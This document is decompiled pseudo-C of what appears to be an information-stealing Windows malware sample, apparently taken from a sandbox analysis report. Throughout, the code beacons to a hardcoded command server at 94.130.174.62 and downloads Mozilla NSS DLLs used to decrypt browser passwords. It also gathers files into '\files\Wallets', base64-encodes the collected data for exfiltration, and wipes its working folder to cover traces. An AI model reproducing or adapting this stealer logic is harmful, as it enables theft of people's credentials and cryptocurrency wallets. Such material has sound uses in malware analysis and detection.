                                                                                				intOrPtr* _t284;
                                                                                				void* _t285;
                                                                                				void* _t292;
                                                                                				void* _t294;
                                                                                				void* _t295;
                                                                                				void* _t298;
                                                                                				intOrPtr* _t300;
                                                                                				void* _t301;
                                                                                				intOrPtr _t307;
                                                                                				intOrPtr* _t309;
                                                                                				intOrPtr* _t313;
                                                                                				intOrPtr* _t317;
                                                                                				intOrPtr* _t321;
                                                                                				intOrPtr* _t325;
                                                                                				intOrPtr* _t329;
                                                                                				CHAR* _t333;
                                                                                				CHAR* _t337;
                                                                                				CHAR* _t341;
                                                                                				CHAR* _t345;
                                                                                				CHAR* _t349;
                                                                                				CHAR* _t353;
                                                                                				CHAR* _t357;
                                                                                				char _t361;
                                                                                				char _t362;
                                                                                				char _t363;
                                                                                				char _t364;
                                                                                				char _t365;
                                                                                				CHAR* _t370;
                                                                                				CHAR* _t376;
                                                                                				CHAR* _t379;
                                                                                				void* _t383;
                                                                                				intOrPtr* _t384;
                                                                                				intOrPtr* _t388;
                                                                                				char* _t393;
                                                                                				signed int _t398;
                                                                                				CHAR* _t401;
                                                                                				void* _t409;
                                                                                				char* _t415;
                                                                                				char* _t418;
                                                                                				char* _t421;
                                                                                				char* _t423;
                                                                                				char* _t425;
                                                                                				char* _t434;
                                                                                				CHAR* _t440;
                                                                                				CHAR* _t444;
                                                                                				intOrPtr* _t447;
                                                                                				char _t452;
                                                                                				void* _t453;
                                                                                				char _t454;
                                                                                				void* _t455;
                                                                                				void* _t460;
                                                                                				void* _t463;
                                                                                				void* _t464;
                                                                                				char _t481;
                                                                                				char* _t550;
                                                                                				int _t565;
                                                                                				char* _t566;
                                                                                				long _t579;
                                                                                				void* _t580;
                                                                                				CHAR* _t582;
                                                                                				char _t583;
                                                                                				CHAR* _t605;
                                                                                				BYTE* _t606;
                                                                                				char* _t607;
                                                                                				void* _t608;
                                                                                				void* _t609;
                                                                                				intOrPtr _t629;
                                                                                				_Unknown_base(*)()* _t630;
                                                                                				void* _t633;
                                                                                				signed int _t636;
                                                                                				signed int _t638;
                                                                                				int _t639;
                                                                                				void _t640;
                                                                                				void* _t641;
                                                                                				void* _t642;
                                                                                				long _t643;
                                                                                				void* _t647;
                                                                                				void* _t648;
                                                                                				long _t649;
                                                                                				signed int _t650;
                                                                                				long _t651;
                                                                                				long _t652;
                                                                                				long _t653;
                                                                                				long _t654;
                                                                                				long _t655;
                                                                                				void _t656;
                                                                                				void* _t657;
                                                                                				void* _t667;
                                                                                
                                                                                				_t667 = __fp0;
                                                                                				_t657 = __eflags;
                                                                                				_t579 = __edx;
                                                                                				_t464 = __ecx;
                                                                                				_push(0xffffffff);
                                                                                				_push(E0043791D);
                                                                                				_push( *[fs:0x0]);
                                                                                				_t638 = (_t636 & 0xfffffff8) - 0x4a0;
                                                                                				_t236 =  *0x447674; // 0x4124c941
                                                                                				_v24 = _t236 ^ _t638;
                                                                                				_push(_t460);
                                                                                				_push(_t580);
                                                                                				_t238 =  *0x447674; // 0x4124c941
                                                                                				_push(_t238 ^ _t638);
                                                                                				 *[fs:0x0] =  &_v16;
                                                                                				_v960 = 0xf;
                                                                                				_v964 = 0;
                                                                                				_v980 = 0;
                                                                                				_v8 = 0;
                                                                                				 *0x44a044 = 0;
                                                                                				 *0x44a050 = 0;
                                                                                				 *0x44a04c = 0;
                                                                                				 *0x44a054 = 0;
                                                                                				 *0x44a03c = 0;
                                                                                				E0040115A(); // executed
                                                                                				E00419473(); // executed
                                                                                				_t245 = E00415610( &_v52); // executed
                                                                                				_v1196 = _t245;
                                                                                				_v12 = 1;
                                                                                				_t246 = E00415BB2(_t460, _t580,  &_v112, _t657);
                                                                                				_v12 = 2;
                                                                                				E0041551F( &_v168, _t464, __edx, _t580, _t246, _t657);
                                                                                				_v12 = 3;
                                                                                				E0040D431(_t246,  &_v644);
                                                                                				_v12 = 4;
                                                                                				_t582 =  &_v1012;
                                                                                				E0040D431(_v1196, _t582);
                                                                                				E00402C34( &_v644, 1, 0);
                                                                                				E00402C34( &_v176, 1, 0);
                                                                                				E00402C34( &_v128, 1, 0);
                                                                                				_t470 =  &_v80;
                                                                                				_v36 = 9;
                                                                                				E00402C34( &_v80, 1, 0);
                                                                                				_t256 = _v1044;
                                                                                				if(_v1024 < 0x10) {
                                                                                					_t256 = _t582;
                                                                                				}
                                                                                				_t257 = CreateMutexA(0, 0, _t256); // executed
                                                                                				_v1168 = _t257;
                                                                                				_t258 = GetLastError();
                                                                                				_t659 = _t258 - 0xb7;
                                                                                				if(_t258 == 0xb7) {
                                                                                					Sleep(0x7530);
                                                                                				}
                                                                                				_t583 = "94.130.174.62";
                                                                                				while(1) {
                                                                                					_push("|");
                                                                                					_t639 = _t638 - 0x1c;
                                                                                					_v1192 = _t639;
                                                                                					E00407DCB(_t639);
                                                                                					_t640 = _t639 - 0x1c;
                                                                                					_t616 = _t640;
                                                                                					_v8 = 0xa;
                                                                                					_v1196 = _t640;
                                                                                					E00407E11(_t640);
                                                                                					_v8 = 9;
                                                                                					E0040A83E(0, _t470, _t583, _t640, _t659);
                                                                                					_t262 = "94.130.174.62"; // 0x312e3439
                                                                                					_t641 = _t640 + 0x3c;
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t262 = _t583;
                                                                                					}
                                                                                					_t263 =  *0x44a1d8(_t262, "ERROR");
                                                                                					_t661 = _t263;
                                                                                					if(_t263 != 0) {
                                                                                						_t656 = _t641 - 0x1c;
                                                                                						_t616 = _t656;
                                                                                						_v1200 = _t656;
                                                                                						E0040410F(_t656, _t583);
                                                                                						E0040A958(0, _t470, _t583, _t656, _t661);
                                                                                						_t641 = _t656 + 0x1c;
                                                                                					}
                                                                                					_t264 = "94.130.174.62"; // 0x312e3439
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t264 = _t583;
                                                                                					}
                                                                                					_t265 =  *0x44a1d8(_t264, "ERROR");
                                                                                					_t663 = _t265;
                                                                                					if(_t265 != 0) {
                                                                                						break;
                                                                                					}
                                                                                					_push("|");
                                                                                					_t653 = _t641 - 0x1c;
                                                                                					_v1208 = _t653;
                                                                                					E00407DEE(_t653);
                                                                                					_t654 = _t653 - 0x1c;
                                                                                					_t616 = _t654;
                                                                                					_v24 = 0xb;
                                                                                					_v1212 = _t654;
                                                                                					E00407E11(_t654);
                                                                                					_v24 = 9;
                                                                                					E0040A83E(0, _t470, _t583, _t654, _t663);
                                                                                					_t452 = "94.130.174.62"; // 0x312e3439
                                                                                					_t641 = _t654 + 0x3c;
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t452 = _t583;
                                                                                					}
                                                                                					_t453 =  *0x44a1d8(_t452, "ERROR");
                                                                                					_t665 = _t453;
                                                                                					if(_t453 != 0) {
                                                                                						_t655 = _t641 - 0x1c;
                                                                                						_t616 = _t655;
                                                                                						_v1216 = _t655;
                                                                                						E0040410F(_t655, _t583);
                                                                                						E0040A958(0, _t470, _t583, _t655, _t665);
                                                                                						_t641 = _t655 + 0x1c;
                                                                                					}
                                                                                					_t454 = "94.130.174.62"; // 0x312e3439
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t454 = _t583;
                                                                                					}
                                                                                					_t455 =  *0x44a1d8(_t454, "ERROR");
                                                                                					_t659 = _t455;
                                                                                					if(_t455 != 0) {
                                                                                						break;
                                                                                					} else {
                                                                                						Sleep(0x1d4c0);
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				_push(3);
                                                                                				_push(0);
                                                                                				_t266 = E0041D251(0, 0x6400000, _t616, __eflags);
                                                                                				_push(0x13);
                                                                                				_v1196 = _t266;
                                                                                				_t267 = E00417368(0,  &_v488, _t579, 0x6400000, _t616, __eflags);
                                                                                				_v28 = 0xe;
                                                                                				E0040CFB8(0x448570, _t267);
                                                                                				_v28 = 9;
                                                                                				E00402C34( &_v492, 1, 0);
                                                                                				_push( *0x449ee0);
                                                                                				_push( &_v892);
                                                                                				_t618 = E0040D47C(0, 0x448570, _t267, __eflags);
                                                                                				_v36 = 0xf;
                                                                                				E0040CFB8(0x44858c, _t271);
                                                                                				_v36 = 9;
                                                                                				E00402C34( &_v892, 1, 0);
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t274 =  *0x44858c; // 0x0
                                                                                				if( *0x4485a0 < 0x10) {
                                                                                					_t274 = 0x44858c;
                                                                                				}
                                                                                				CreateDirectoryA(_t274, 0);
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t276 =  *0x44858c; // 0x0
                                                                                				if(__eflags < 0) {
                                                                                					_t276 = 0x44858c;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t276);
                                                                                				_push("\\files");
                                                                                				_push( &_v268);
                                                                                				_t279 = E0040D337(0, 0x44858c, _t618, __eflags);
                                                                                				__eflags = _t279[0x14] - 0x10;
                                                                                				if(_t279[0x14] >= 0x10) {
                                                                                					_t279 =  *_t279;
                                                                                				}
                                                                                				CreateDirectoryA(_t279, 0);
                                                                                				E00402C34( &_v268, 1, 0);
                                                                                				_t282 = E00407D85( &_v444);
                                                                                				_t620 = "/";
                                                                                				_v36 = 0x10;
                                                                                				_t284 = E0040D3FA( &_v268,  &_v836, "/", _t282);
                                                                                				_t642 = _t641 + 0xc;
                                                                                				_v36 = 0x11;
                                                                                				__eflags =  *((intOrPtr*)(_t284 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t284 + 0x14)) >= 0x10) {
                                                                                					_t284 =  *_t284;
                                                                                				}
                                                                                				__eflags =  *0x448530 - 0x10;
                                                                                				_t481 = "94.130.174.62"; // 0x312e3439
                                                                                				if( *0x448530 < 0x10) {
                                                                                					_t481 = "94.130.174.62";
                                                                                				}
                                                                                				_push(_t284);
                                                                                				_t285 = E0040ED7D(_t481, _t579);
                                                                                				_t643 = _t642 - 0x18;
                                                                                				_v1212 = _t643;
                                                                                				E0040C606(_t643, _t285);
                                                                                				E00407FEB(0, 0x44858c, _t620, __eflags);
                                                                                				E00402C34( &_v832, 1, 0);
                                                                                				_v40 = 9;
                                                                                				E00402C34( &_v448, 1, 0);
                                                                                				_v1116 = 0xf;
                                                                                				_v1120 = 0;
                                                                                				_v1136 = 0;
                                                                                				E0040381A( &_v1136,  *0x449ee0);
                                                                                				_push("http://");
                                                                                				_push( &_v404);
                                                                                				_v52 = 0x12;
                                                                                				_t292 = E0040D47C(0, "94.130.174.62", _t620, __eflags);
                                                                                				_v52 = 0x13;
                                                                                				_t294 = E0040D3C3( &_v1136,  &_v740, _t292, _t620);
                                                                                				_t295 = 0xa;
                                                                                				_v52 = 0x14;
                                                                                				_t298 = E0040D3C3( &_v1136,  &_v180, _t294, E00417319(_t295, __eflags));
                                                                                				_v52 = 0x15;
                                                                                				_t300 = E0040D3C3( &_v1136,  &_v796, _t298, ".zip");
                                                                                				_t647 = _t643 + 0x48;
                                                                                				_v52 = 0x16;
                                                                                				__eflags =  *((intOrPtr*)(_t300 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t300 + 0x14)) >= 0x10) {
                                                                                					_t300 =  *_t300;
                                                                                				}
                                                                                				_t301 = E0040EF26(_t300);
                                                                                				_v1208 = _t579;
                                                                                				E00402C34( &_v772, 1, 0);
                                                                                				E00402C34( &_v164, 1, 0);
                                                                                				E00402C34( &_v732, 1, 0);
                                                                                				_v52 = 0x12;
                                                                                				E00402C34( &_v404, 1, 0);
                                                                                				_push(_v1240);
                                                                                				_push(_t301);
                                                                                				 *0x44a040 = E00407B7E(0, _t579, _t301, 1, __eflags);
                                                                                				_t307 = E0040AA08(0, 0x43e028, 0);
                                                                                				_t648 = _t647 + 0xc;
                                                                                				_v1244 = _t307;
                                                                                				_push("\\vcruntime140.dll");
                                                                                				_push( &_v1000);
                                                                                				_v1240 = _t579;
                                                                                				_t309 = E0040D337(0,  &_v1148, 1, __eflags);
                                                                                				_v60 = 0x17;
                                                                                				__eflags =  *((intOrPtr*)(_t309 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t309 + 0x14)) >= 0x10) {
                                                                                					_t309 =  *_t309;
                                                                                				}
                                                                                				E0040AA08(0, _t309, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v968, 1, 0);
                                                                                				_push("\\softokn3.dll");
                                                                                				_push( &_v220);
                                                                                				_t313 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x18;
                                                                                				__eflags =  *((intOrPtr*)(_t313 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t313 + 0x14)) >= 0x10) {
                                                                                					_t313 =  *_t313;
                                                                                				}
                                                                                				E0040AA08(0, _t313, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v212, 1, 0);
                                                                                				_push("\\nss3.dll");
                                                                                				_push( &_v612);
                                                                                				_t317 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x19;
                                                                                				__eflags =  *((intOrPtr*)(_t317 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t317 + 0x14)) >= 0x10) {
                                                                                					_t317 =  *_t317;
                                                                                				}
                                                                                				E0040AA08(0, _t317, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v604, 1, 0);
                                                                                				_push("\\msvcp140.dll");
                                                                                				_push( &_v332);
                                                                                				_t321 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1a;
                                                                                				__eflags =  *((intOrPtr*)(_t321 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t321 + 0x14)) >= 0x10) {
                                                                                					_t321 =  *_t321;
                                                                                				}
                                                                                				E0040AA08(0, _t321, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v324, 1, 0);
                                                                                				_push("\\mozglue.dll");
                                                                                				_push( &_v556);
                                                                                				_t325 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1b;
                                                                                				__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t325 + 0x14)) >= 0x10) {
                                                                                					_t325 =  *_t325;
                                                                                				}
                                                                                				E0040AA08(0, _t325, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v548, 1, 0);
                                                                                				_push("\\freebl3.dll");
                                                                                				_push( &_v108);
                                                                                				_t329 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1c;
                                                                                				__eflags =  *((intOrPtr*)(_t329 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t329 + 0x14)) >= 0x10) {
                                                                                					_t329 =  *_t329;
                                                                                				}
                                                                                				E0040AA08(0, _t329, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v100, 1, 0);
                                                                                				_push( *0x449ce0);
                                                                                				_push( &_v948);
                                                                                				_t333 = E0040D337(0, 0x44858c, 1, __eflags);
                                                                                				__eflags = _t333[0x14] - 0x10;
                                                                                				if(_t333[0x14] >= 0x10) {
                                                                                					_t333 =  *_t333;
                                                                                				}
                                                                                				_t624 = CreateDirectoryA;
                                                                                				CreateDirectoryA(_t333, 0);
                                                                                				E00402C34( &_v940, 1, 0);
                                                                                				_push( *0x449d00);
                                                                                				_push( &_v920);
                                                                                				_t337 = E0040D337(0, 0x44858c, CreateDirectoryA, __eflags);
                                                                                				__eflags = _t337[0x14] - 0x10;
                                                                                				if(_t337[0x14] >= 0x10) {
                                                                                					_t337 =  *_t337;
                                                                                				}
                                                                                				CreateDirectoryA(_t337, 0);
                                                                                				E00402C34( &_v912, 1, 0);
                                                                                				_push( *0x449e88);
                                                                                				_push( &_v864);
                                                                                				_t341 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t341[0x14] - 0x10;
                                                                                				if(_t341[0x14] >= 0x10) {
                                                                                					_t341 =  *_t341;
                                                                                				}
                                                                                				CreateDirectoryA(_t341, 0);
                                                                                				E00402C34( &_v856, 1, 0);
                                                                                				_push( *0x449f54);
                                                                                				_push( &_v808);
                                                                                				_t345 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t345[0x14] - 0x10;
                                                                                				if(_t345[0x14] >= 0x10) {
                                                                                					_t345 =  *_t345;
                                                                                				}
                                                                                				CreateDirectoryA(_t345, 0);
                                                                                				E00402C34( &_v800, 1, 0);
                                                                                				_push( *0x449d4c);
                                                                                				_push( &_v752);
                                                                                				_t349 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t349[0x14] - 0x10;
                                                                                				if(_t349[0x14] >= 0x10) {
                                                                                					_t349 =  *_t349;
                                                                                				}
                                                                                				CreateDirectoryA(_t349, 0);
                                                                                				E00402C34( &_v744, 1, 0);
                                                                                				_push( *0x449df0);
                                                                                				_push( &_v696);
                                                                                				_t353 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t353[0x14] - 0x10;
                                                                                				if(_t353[0x14] >= 0x10) {
                                                                                					_t353 =  *_t353;
                                                                                				}
                                                                                				CreateDirectoryA(_t353, 0);
                                                                                				E00402C34( &_v688, 1, 0);
                                                                                				_push( *0x449f00);
                                                                                				_push( &_v640);
                                                                                				_t357 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t357[0x14] - 0x10;
                                                                                				if(_t357[0x14] >= 0x10) {
                                                                                					_t357 =  *_t357;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t357);
                                                                                				E00402C34( &_v632, 1, 0);
                                                                                				E0040410F( &_v1160, 0x44858c);
                                                                                				_v1072 = 0xf;
                                                                                				_v1076 = 0;
                                                                                				_v1092 = 0;
                                                                                				_v40 = 0x1e;
                                                                                				_t361 =  *0x44a330; // 0x0
                                                                                				_v1099 = _t361;
                                                                                				_t362 =  *0x44a331; // 0x0
                                                                                				_v1098 = _t362;
                                                                                				_t363 =  *0x44a333; // 0x0
                                                                                				_v1097 = _t363;
                                                                                				_t364 =  *0x44a334; // 0x0
                                                                                				_v1096 = _t364;
                                                                                				_t365 =  *0x44a335; // 0x0
                                                                                				_v1095 = _t365;
                                                                                				_v1100 = 1;
                                                                                				E00403C13( &_v1092,  &_v1160, 0, 0xffffffff);
                                                                                				E00402C34( &_v1160, 1, 0);
                                                                                				_v60 = 0x1f;
                                                                                				E00413F3C(_t579,  &_v1120, __eflags, _v1244, _v1240);
                                                                                				_t627 =  &_v616;
                                                                                				_t370 = E0040410F( &_v616, 0x44858c);
                                                                                				__eflags = _t370[0x14] - 0x10;
                                                                                				if(_t370[0x14] >= 0x10) {
                                                                                					_t370 =  *_t370;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t370);
                                                                                				E00402C34( &_v576, 1, 0);
                                                                                				E004036F6();
                                                                                				_push(_v1208);
                                                                                				E0040ABD6(0,  &_v576, _t579, 0x44858c, _t627, __eflags, _t667);
                                                                                				_t605 = 0x44858c;
                                                                                				__eflags =  *0x44a337; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					_push( *0x449ebc);
                                                                                					_push( &_v520);
                                                                                					_t440 = E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					__eflags = _t440[0x14] - 0x10;
                                                                                					if(_t440[0x14] >= 0x10) {
                                                                                						_t440 =  *_t440;
                                                                                					}
                                                                                					CreateDirectoryA(_t440, 0);
                                                                                					E00402C34( &_v520, 1, 0);
                                                                                					_push( *0x449ebc);
                                                                                					_push( &_v472);
                                                                                					_t444 = E0040D337(0, _t605, _t627, __eflags);
                                                                                					__eflags = _t444[0x14] - 0x10;
                                                                                					if(_t444[0x14] >= 0x10) {
                                                                                						_t444 =  *_t444;
                                                                                					}
                                                                                					SetCurrentDirectoryA(_t444);
                                                                                					E00402C34( &_v464, 1, 0);
                                                                                					__eflags =  *0x448568 - 0x10;
                                                                                					_t447 =  *0x448554; // 0x0
                                                                                					if(__eflags < 0) {
                                                                                						_t447 = 0x448554;
                                                                                					}
                                                                                					E00409D7B(_t579, __eflags, _t447);
                                                                                				}
                                                                                				_push("\\files");
                                                                                				_push( &_v408);
                                                                                				_t376 = E0040D337(0, _t605, _t627, __eflags);
                                                                                				__eflags = _t376[0x14] - 0x10;
                                                                                				if(_t376[0x14] >= 0x10) {
                                                                                					_t376 =  *_t376;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t376);
                                                                                				E00402C34( &_v408, 1, 0);
                                                                                				__eflags =  *0x44a332; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					_t651 = _t648 - 0x1c;
                                                                                					_v1212 = _t651;
                                                                                					_push("\\files\\Wallets");
                                                                                					_push(_t651);
                                                                                					_t605 = 0x44858c;
                                                                                					E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					E0040DBBA(0,  &_v1000, 0x44858c, _t627, __eflags);
                                                                                					_push("\\files\\");
                                                                                					_push( &_v380);
                                                                                					_t434 = E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					_t652 = _t651 - 0x14;
                                                                                					_t627 = _t434;
                                                                                					_v56 = 0x20;
                                                                                					_v1240 = _t652;
                                                                                					E0040C626(_t652);
                                                                                					E00408FB7(0, 0x44858c, _t434, __eflags);
                                                                                					_t648 = _t652 + 0x1c;
                                                                                					_t171 =  &_v380; // 0x3a0
                                                                                					_v56 = 0x1f;
                                                                                					E00402C34(_t171, 1, 0);
                                                                                				}
                                                                                				__eflags =  *0x44a336; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					E00417D56();
                                                                                				}
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t379 =  *0x44858c; // 0x0
                                                                                				if( *0x4485a0 < 0x10) {
                                                                                					_t379 = _t605;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t379);
                                                                                				_push(0xf423f);
                                                                                				_push(0);
                                                                                				_t649 = _t648 - 0x1c;
                                                                                				_t550 = _t649;
                                                                                				_v1212 = _t649;
                                                                                				 *((intOrPtr*)(_t550 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t550 + 0x10)) = 0;
                                                                                				 *_t550 = 0;
                                                                                				E0040381A(_t550, "*.*");
                                                                                				_push("\\files");
                                                                                				_push( &_v244);
                                                                                				_v32 = 0x21;
                                                                                				_t383 = E0040D337(0, _t605, _t627, __eflags);
                                                                                				_t553 =  &_v300;
                                                                                				_v32 = 0x22;
                                                                                				_t384 = E004175C4(_t383,  &_v300);
                                                                                				_v36 = 0x23;
                                                                                				__eflags =  *((intOrPtr*)(_t384 + 0x14)) - 8;
                                                                                				if(__eflags >= 0) {
                                                                                					_t384 =  *_t384;
                                                                                				}
                                                                                				_push(0x441100);
                                                                                				_push(_t384);
                                                                                				_push(_v1200);
                                                                                				_v28 = 0x25;
                                                                                				E00408117(0, _t553, _t579, _t605, _t627, __eflags);
                                                                                				_t650 = _t649 + 0x30;
                                                                                				_t606 = 0;
                                                                                				E00403960(0,  &_v296, 1);
                                                                                				_v32 = 0x1f;
                                                                                				E00402C34( &_v244, 1, 0);
                                                                                				__eflags = _v1212;
                                                                                				if(_v1212 != 0) {
                                                                                					_t388 = _v1200;
                                                                                					__eflags =  *_t388 - 2;
                                                                                					if( *_t388 == 2) {
                                                                                						_t629 =  *((intOrPtr*)(_t388 + 4));
                                                                                						__eflags =  *(_t629 + 0x2c);
                                                                                						if( *(_t629 + 0x2c) == 0) {
                                                                                							E0041D1A8(_t629, 0,  &_v244);
                                                                                						}
                                                                                						_t606 =  *(_t629 + 0x20);
                                                                                						_v1216 =  *((intOrPtr*)(_t629 + 0x18));
                                                                                						asm("sbb eax, eax");
                                                                                						_t393 = ( ~_t606 & 0xfffe0000) + 0x20000;
                                                                                						__eflags = _t393;
                                                                                						 *(_t629 + 0x2c) = 1;
                                                                                						 *0x44a438 = _t393;
                                                                                					} else {
                                                                                						_t606 = _v1188;
                                                                                						 *0x44a438 = 0x80000;
                                                                                					}
                                                                                				} else {
                                                                                					_v1216 = 0;
                                                                                					 *0x44a438 = 0x10000;
                                                                                				}
                                                                                				_v1204 = 0;
                                                                                				_v1212 = 0;
                                                                                				__eflags = _t606;
                                                                                				if(_t606 == 0) {
                                                                                					L91:
                                                                                					_v1196 = _v1212;
                                                                                					_v1192 = _v1204;
                                                                                					_t630 = E0040AAB2;
                                                                                					CreateThread(0, 0, E0040AAB2,  &_v1196, 0, 0);
                                                                                					_v1220 = 0;
                                                                                					__eflags =  *0x44a33c; // 0x0
                                                                                					if(__eflags != 0) {
                                                                                						L103:
                                                                                						_t398 = CloseHandle(_v1192);
                                                                                						_t607 = _v1204;
                                                                                						__eflags = _t607;
                                                                                						if(_t607 == 0) {
                                                                                							L106:
                                                                                							E0041D357(_t607);
                                                                                							L107:
                                                                                							SetCurrentDirectoryA("C:\\ProgramData");
                                                                                							__eflags =  *0x4485a0 - 0x10;
                                                                                							_t401 =  *0x44858c; // 0x0
                                                                                							if(__eflags < 0) {
                                                                                								_t401 = 0x44858c;
                                                                                							}
                                                                                							_v1180 = _t401;
                                                                                							_v1176 = 0x43e028;
                                                                                							_v1162 = 0x43e028;
                                                                                							_v1188 = 0;
                                                                                							_v1184 = 3;
                                                                                							_v1172 = 0x414;
                                                                                							_v1170 = 0;
                                                                                							_v1166 = 0;
                                                                                							SHFileOperation( &_v1188);
                                                                                							E004179DA(0, 0x414, _t579, _t607, _t630, __eflags);
                                                                                							E00402C34( &_v1084, 1, 0);
                                                                                							E00402C34( &_v1128, 1, 0);
                                                                                							E00402C34( &_v1048, 1, 0);
                                                                                							_t409 = E00402C34( &_v1028, 1, 0);
                                                                                							 *[fs:0x0] = _v72;
                                                                                							_pop(_t608);
                                                                                							_pop(_t633);
                                                                                							_pop(_t463);
                                                                                							__eflags = _v80 ^ _t650;
                                                                                							return E0041DEB4(_t409, _t463, _v80 ^ _t650, _t579, _t608, _t633);
                                                                                						}
                                                                                						 *_t607 - 1 = _t398 & 0xffffff00 |  *_t607 == 0x00000001;
                                                                                						if((_t398 & 0xffffff00 |  *_t607 == 0x00000001) == 0) {
                                                                                							goto L106;
                                                                                						}
                                                                                						E00407C94(_t630, _t607);
                                                                                						goto L107;
                                                                                					}
                                                                                					_t609 = 0x3c;
                                                                                					do {
                                                                                						_t565 = _v1220;
                                                                                						__eflags = _t565 - 0x12c;
                                                                                						if(__eflags > 0) {
                                                                                							_t415 = _t565 - 0x168;
                                                                                							__eflags = _t415;
                                                                                							L98:
                                                                                							if(__eflags == 0) {
                                                                                								L101:
                                                                                								CreateThread(0, 0, _t630,  &_v1200, 0, 0);
                                                                                								goto L102;
                                                                                							}
                                                                                							_t418 = _t415 - _t609;
                                                                                							__eflags = _t418;
                                                                                							if(_t418 == 0) {
                                                                                								goto L101;
                                                                                							}
                                                                                							__eflags = _t418 != _t609;
                                                                                							if(_t418 != _t609) {
                                                                                								goto L102;
                                                                                							}
                                                                                							goto L101;
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							goto L101;
                                                                                						}
                                                                                						_t421 = _t565 - _t609;
                                                                                						__eflags = _t421;
                                                                                						if(__eflags == 0) {
                                                                                							goto L101;
                                                                                						}
                                                                                						_t415 = _t421 - _t609;
                                                                                						goto L98;
                                                                                						L102:
                                                                                						Sleep(0x3e8);
                                                                                						_v1224 = _v1224 + 1;
                                                                                						__eflags =  *0x44a33c; // 0x0
                                                                                					} while (__eflags == 0);
                                                                                					goto L103;
                                                                                				} else {
                                                                                					_t423 = CryptBinaryToStringA(_t606, _v1216, 0x40000001, 0,  &_v1204);
                                                                                					__eflags = _t423;
                                                                                					if(_t423 == 0) {
                                                                                						goto L91;
                                                                                					}
                                                                                					_t425 = HeapAlloc(GetProcessHeap(), 0, _v1220);
                                                                                					_v1228 = _t425;
                                                                                					__eflags = _t425;
                                                                                					if(_t425 == 0) {
                                                                                						goto L91;
                                                                                					}
                                                                                					_t579 = _v1220;
                                                                                					_t566 = _t425;
                                                                                					__eflags = _t579;
                                                                                					if(_t579 == 0) {
                                                                                						L90:
                                                                                						CryptBinaryToStringA(_t606, _v1232, 0x40000001, _t425,  &_v1220);
                                                                                						goto L91;
                                                                                					} else {
                                                                                						goto L89;
                                                                                					}
                                                                                					do {
                                                                                						L89:
                                                                                						 *_t566 = 0;
                                                                                						_t566 =  &(_t566[1]);
                                                                                						_t579 = _t579 - 1;
                                                                                						__eflags = _t579;
                                                                                					} while (_t579 != 0);
                                                                                					goto L90;
                                                                                				}
                                                                                			}




































































































































































































































                                                                                0x0040b5ad
                                                                                0x0040b5ad
                                                                                0x0040b5ad
                                                                                0x0040b5ad
                                                                                0x0040b5b3
                                                                                0x0040b5b5
                                                                                0x0040b5c0
                                                                                0x0040b5c1
                                                                                0x0040b5c7
                                                                                0x0040b5ce
                                                                                0x0040b5d5
                                                                                0x0040b5d7
                                                                                0x0040b5d8
                                                                                0x0040b5df
                                                                                0x0040b5e7
                                                                                0x0040b5ef
                                                                                0x0040b5fa
                                                                                0x0040b601
                                                                                0x0040b608
                                                                                0x0040b60f
                                                                                0x0040b614
                                                                                0x0040b619
                                                                                0x0040b61e
                                                                                0x0040b623
                                                                                0x0040b628
                                                                                0x0040b62d
                                                                                0x0040b63a
                                                                                0x0040b63f
                                                                                0x0040b64a
                                                                                0x0040b652
                                                                                0x0040b660
                                                                                0x0040b668
                                                                                0x0040b678
                                                                                0x0040b680
                                                                                0x0040b687
                                                                                0x0040b693
                                                                                0x0040b69a
                                                                                0x0040b6ad
                                                                                0x0040b6bb
                                                                                0x0040b6c9
                                                                                0x0040b6d0
                                                                                0x0040b6d7
                                                                                0x0040b6df
                                                                                0x0040b6ec
                                                                                0x0040b6f3
                                                                                0x0040b6f5
                                                                                0x0040b6f5
                                                                                0x0040b6fa
                                                                                0x0040b700
                                                                                0x0040b704
